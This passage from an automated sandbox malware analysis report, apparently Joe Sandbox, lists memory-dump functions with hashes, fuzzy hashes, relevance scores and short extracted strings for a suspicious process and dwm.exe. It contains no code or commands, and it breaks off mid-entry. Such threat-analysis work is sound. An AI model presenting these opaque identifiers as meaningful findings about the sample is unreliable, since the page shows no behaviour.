Opcode ID: 852c0817b540905113a75dcea2f43823a6b5c345ea7e6280669b06f67a56415d
Instruction ID: 03457aa09373ab5de21b3bef5727d949f62d30e2db57363b87a123bd183a67e6
Opcode Fuzzy Hash: 852c0817b540905113a75dcea2f43823a6b5c345ea7e6280669b06f67a56415d
Instruction Fuzzy Hash: A2F08C6194E7CA4FD30B073848640683F70AE6722130E00E3C085CF1F3D91DAC4AC3A2

Function 00007FF887D6A7C9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1d7bf1f0f1ce5b1b82e7b8617f1fd2d93984932c5baf46b543a7529ccaba36
Instruction ID: c8aee4e5afcd30683c8c7ac6ecd381e6c2d6b18c50c6229b6f7aac1bfc2d2f9d
Opcode Fuzzy Hash: 3c1d7bf1f0f1ce5b1b82e7b8617f1fd2d93984932c5baf46b543a7529ccaba36
Instruction Fuzzy Hash: E0F0A021B4CBC44FC729966958A50617FF1EF9B51134A02FFC08BC76A3ED59AC8A8342

Function 00007FF887D33C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: fb074373178a1185dd59f53d940df2e4934aeac0164d3fb6d9ec219f49026a50
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: 81F0CD3198881B8AFB64EB14C954BBD7272FB54351F1442BAC00FD7199EE786985CA00

Function 00007FF887D30B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c52c8a9632081a0fa64d9c922f9fa4c0d1032b2de0294526d2beab3561881f
Instruction ID: adf0ca79b9897126a7e8f54ff09e0490de67909bd5883f1c56918b62763792fd
Opcode Fuzzy Hash: 36c52c8a9632081a0fa64d9c922f9fa4c0d1032b2de0294526d2beab3561881f
Instruction Fuzzy Hash: B9E0613A55D945CFD740DB39DCA54D47B50FF4221874612FEC049C7562D311596DC740

Function 00007FF887D30C68 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb470d0da8597f4a8cf17a6d9c1f47a3ae343207136f3bc15cb9629c8751f2fd
Instruction ID: 694c6f352adf96e25f4967c092d411bc5a30cf1e79d47a5383842b554da3debf
Opcode Fuzzy Hash: eb470d0da8597f4a8cf17a6d9c1f47a3ae343207136f3bc15cb9629c8751f2fd
Instruction Fuzzy Hash: 15F0FE34D5460EDBEB00DFA4C4845DEB7F1FB58354F1046A5D419D7288EA346694CB80

Function 00007FF887D6AB60 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b8fd470d3e3f43032cda2b57832348a26218fe60c5bdbc1b3ec2832bf27973
Instruction ID: b64f570028ea27c5c9e9f4e64064e5b400d6c8d10dd636cfc96fc5511534a616
Opcode Fuzzy Hash: 87b8fd470d3e3f43032cda2b57832348a26218fe60c5bdbc1b3ec2832bf27973
Instruction Fuzzy Hash: 19E09B20A98D098FE684E75880967BCB2E2FF98340F440275E00EC35D7CE286840D782

Function 00007FF887D6D7D9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061397cc657d07c221dec3e91899bc5d93689643f52c2c013fcb36fbaf9ff3db
Instruction ID: b9ba8631101439ad73361a986dd45e3d13aa3701fa83873703121a49c38a3d36
Opcode Fuzzy Hash: 061397cc657d07c221dec3e91899bc5d93689643f52c2c013fcb36fbaf9ff3db
Instruction Fuzzy Hash: 40E04F6288E7C04FC70B9B3498A88947FB0EE1721074A41EBC04ACF5B3D92A984AC702

Function 00007FF887D6D759 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9496bd7971bb98aa3b764f33d782003d8c9b1b19e61d1603f6a369d6b1e87d53
Instruction ID: aa26020289bb0237e620e1bf212ea3914d527f28ea8ddb83437542107a18161c
Opcode Fuzzy Hash: 9496bd7971bb98aa3b764f33d782003d8c9b1b19e61d1603f6a369d6b1e87d53
Instruction Fuzzy Hash: 4FE04F6288E7C08FC70B9B3488688947FB0EE1721074E41EBC086CF5B3E52A9C49C712

Function 00007FF887D55D05 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d54000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d79e79d99217b191b744ba035015c5e0a6c81610b2c666e389ed0d16c42999
Instruction ID: 0fd11addad3244bca0f123316b3320c90fd15fed94a5d855cb8b6c226c663c0b
Opcode Fuzzy Hash: 44d79e79d99217b191b744ba035015c5e0a6c81610b2c666e389ed0d16c42999
Instruction Fuzzy Hash: 63D0126589F6D60FD75342390C280587F60AA6325175D01EBC08ACA093D54D4497C391

Function 00007FF887D43EF0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FF887D6A330 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF887D6A2A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF887D36D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: 1495345512d9913066ee7aef0bf2c4060e277f46f46922c0ca8dc198698361a3
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction Fuzzy Hash: 97E01A21E4C41747FB94A694D8407BD6271FB84384F1861B8E94FA33C6EE38AE45CB15

Function 00007FF887D43F80 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D61D40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D6B5B8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593bc822e52f18a3febb77109198debad18a33f0af443626aab64500df5f64d2
Instruction ID: bffbdc745603135e5492ebcfd8e3d9d02bbbfaa0aa748f32f32b8d6c7e9db9dc
Opcode Fuzzy Hash: 593bc822e52f18a3febb77109198debad18a33f0af443626aab64500df5f64d2
Instruction Fuzzy Hash: 54D02230B948000F8B0CA738884883433A0EB6A20278000A8E00BC72B1D96AEC88C781

Function 00007FF887D66D68 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: d5ed12c32eaec457ebb9ff4ee8ca2419b3863d361682079ec1126d354d4eeb27
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: 90D01234BA09044F870CAA38885987473A1EB6A61679541A9E00BCB2B5D96AEC89C781

Function 00007FF887D4BFFF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9b95885cbf20370d44d20922f00543ffd68689822ad91f346fa7f6e5f46571
Instruction ID: 05dbd0184bfd9d983f608f5aa051b79b9d9c7fe665dd48a3b9e25661dc0dc138
Opcode Fuzzy Hash: ed9b95885cbf20370d44d20922f00543ffd68689822ad91f346fa7f6e5f46571
Instruction Fuzzy Hash: 93E0B634D48619CFEBB1DA54D8547AC66B1BF14341F1442F6C84E972DADB386D80CF51

Function 00007FF887D30CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: dd6242d04ce97849c19ce36e6f963bc39dfd5a37c82b12a309747b1590a09e3f
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: 0EE01234A4820BCBF700DB94C4845AE7772FB51365F148365C41A8738DEE786684C780

Function 00007FF887D36DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: ee9e8feb70d153378380fa8e198161fba8e25b3a5c752ca46a9c467e3512a3b3
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: 0DD05E10D4C0034BFB54425494503B923B1AF55384F1812B9E90E932D5EE28AC02C614

Function 00007FF887D44D2D Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction ID: 4561ce1efa857dba0b15e868a44dc4cdf6ef8404e5f99c51443ee39ed9e67e29
Opcode Fuzzy Hash: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction Fuzzy Hash: 8ED0C93094C95B8FFA89EA08D440BAD33B1BF04385F000970E80ED31DBDE68A892C741

Function 00007FF887D6BC60 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction ID: 134ff038b16ac3a5debbadf378629eb73313cfdcf543302f682dd8ed702abee2
Opcode Fuzzy Hash: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction Fuzzy Hash: 4DC08040CD988A55D8187175185357874F0FF45360FCA0274F40D410D7EC0D248842C7

Function 00007FF887D306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: 3c8c7a12f46d040b177e6fa5b4f15f9ad65f30043e1dc96452920b4aa72fdaeb
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 7BC08C00EDA90F03B40471AE14020ACA122BBC4294FE80372C55F400CDFC0D20C5C196

Function 00007FF887D48729 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction ID: ed53f0d82fc899826dfc675ea863d38c11ad370ec8380a4b9705f52df407997b
Opcode Fuzzy Hash: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction Fuzzy Hash: 50D0C930D045188EDBA0EA54C84079876B1BF04301F5041F6840ED3286CB39AD40CF60

Function 00007FF887D35472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dacd5710ca29ec009d57cbbc5e486cd6eef9134c3218623db7675be1cbaa28bf
Instruction ID: 78d5978ac33f319ba0c455f18edbc74acc603461e8d9ed192d96cb7c47b42072
Opcode Fuzzy Hash: dacd5710ca29ec009d57cbbc5e486cd6eef9134c3218623db7675be1cbaa28bf
Instruction Fuzzy Hash: 4DC08C01F1881782F5052298401127F04029B40B40F808038E02EC62CFCF0C9A0142C3

Function 00007FF887D6AB4A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d61000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction ID: 1b77c79c96c8597be0e9ddc115c092183d74075ec850a7222dcdc1b8c86bc125
Opcode Fuzzy Hash: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction Fuzzy Hash: 4EB01251E4484F0BB1C8642C10492FA12D3F7B8581B410234A00EC31CFFC0478524140

Function 00007FF887D306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 4e506ea6fed3011a212eaa031edcb949e7b7c182204628fb5be02b2d35d2b1fa
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 44B01200CE644F01B40831BE084206D7060BB44148FD402B0D84E40089F84D10D44292

Non-executed Functions

Function 00007FF887D54694 Relevance: 16.4, Strings: 13, Instructions: 190COMMON

Download Yara Rule

Strings

XEL, xrefs: 00007FF887D54816
XEL, xrefs: 00007FF887D546B8
XEL, xrefs: 00007FF887D54695
XEL, xrefs: 00007FF887D546FE
XEL, xrefs: 00007FF887D54839
XEL, xrefs: 00007FF887D54721
XEL, xrefs: 00007FF887D547F3
XEL, xrefs: 00007FF887D547D0
XEL, xrefs: 00007FF887D54767
XEL, xrefs: 00007FF887D547AD
XEL, xrefs: 00007FF887D546DB
XEL, xrefs: 00007FF887D54744
XEL, xrefs: 00007FF887D5478A

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d54000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL
API String ID: 0-1101732248
Opcode ID: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction ID: 768766a15f36f29f24d4158182e76a936788b1c1c27264f34ffa4431e4c5e757
Opcode Fuzzy Hash: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction Fuzzy Hash: 3341B466F18C5D4BE9A9A6AC542A3BC63F1FB98AD2381027AC01FC32D6DD1D5C1343C2

Function 00007FF887D309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF887D30B3E
c9, xrefs: 00007FF887D30B56
!k9, xrefs: 00007FF887D30B4E
"s9, xrefs: 00007FF887D30B46

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction ID: cc622070d3f773a016e1edc4b06f745d8038eabbb8addafcbf291706f69c27a8
Opcode Fuzzy Hash: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction Fuzzy Hash: 88416C07E485A795E11132FEF0122ED6B549F812B9B084677E17E89183CD0CB987C6F6

Analysis Process: dwm.exePID: 6848, Parent PID: 3504COMMON

Executed Functions

Function 00007FF887D30D48 Relevance: 6.5, Strings: 5, Instructions: 232COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887D30F17
r6B, xrefs: 00007FF887D30EA7
5[_H, xrefs: 00007FF887D30DF3
r6B, xrefs: 00007FF887D30EC5
"9B, xrefs: 00007FF887D30DD1

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID: "9B$5[_H$b4B$r6B$r6B
API String ID: 0-1423679481
Opcode ID: 2234f1700e8256baa6bc199e663d946e81940fe76560161635d2220b32982396
Instruction ID: 50002da5ef6f7a5c5954f4c6d9560b0e3f8947cfe4f9bd4aacf9594f8a9b895f
Opcode Fuzzy Hash: 2234f1700e8256baa6bc199e663d946e81940fe76560161635d2220b32982396
Instruction Fuzzy Hash: 4171F175E18A8A8FE789DBAC98253BC7FF2FB95340F4401BAC01AD72D6DA785811C701

Function 00007FF887D610E5 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D61161

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 2b2755c89892013445a5d2efa2b7c1a1d5687e3aa7c2eb45d5040cca0096277a
Instruction ID: 33dcda93ae5b625363f4f71a733575f3d0fa38bdf74c07ac282454b39f78077d
Opcode Fuzzy Hash: 2b2755c89892013445a5d2efa2b7c1a1d5687e3aa7c2eb45d5040cca0096277a
Instruction Fuzzy Hash: F1C18D319AD6960BE31D59684C830B977A1FF92345B28937DDDDB8348BED19B407C2C2

Function 00007FF887D597D1 Relevance: 4.1, Strings: 3, Instructions: 322COMMON

Download Yara Rule

Strings

p[D, xrefs: 00007FF887D59ADD
XE, xrefs: 00007FF887D59820
r6B, xrefs: 00007FF887D599F9

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID: XE$p[D$r6B
API String ID: 0-863143724
Opcode ID: 00ba272176b2492901a1af3c56e393c47f830c80a6d74f32a081e079cba699b7
Instruction ID: 598fe422e61163f6b6f1a27e2a094a26e8753426973d4b03d9cb0ce3f85dbfc3
Opcode Fuzzy Hash: 00ba272176b2492901a1af3c56e393c47f830c80a6d74f32a081e079cba699b7
Instruction Fuzzy Hash: F0B1A270A589498FEB44EB68D4956BD77F2FFA8340F504679D01EC7296CF38A842CB41

Function 00007FF887D30E43 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887D30F17
r6B, xrefs: 00007FF887D30EA7
r6B, xrefs: 00007FF887D30EC5

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: 5fe50f1f15e65efd8305c9b4a9eba578de08b877527725dcd3ac9eada8ffb0bc
Instruction ID: 7a236c1706d831e162fc44fba6f871028ad00be08130f69e244e627271194ac7
Opcode Fuzzy Hash: 5fe50f1f15e65efd8305c9b4a9eba578de08b877527725dcd3ac9eada8ffb0bc
Instruction Fuzzy Hash: 0D41C375A18A8A8EF798DB6CE8553BD7FE1FB95350F4001BAC01ED76D5DA781812C700

Function 00007FF887D62361 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D62511

Memory Dump Source

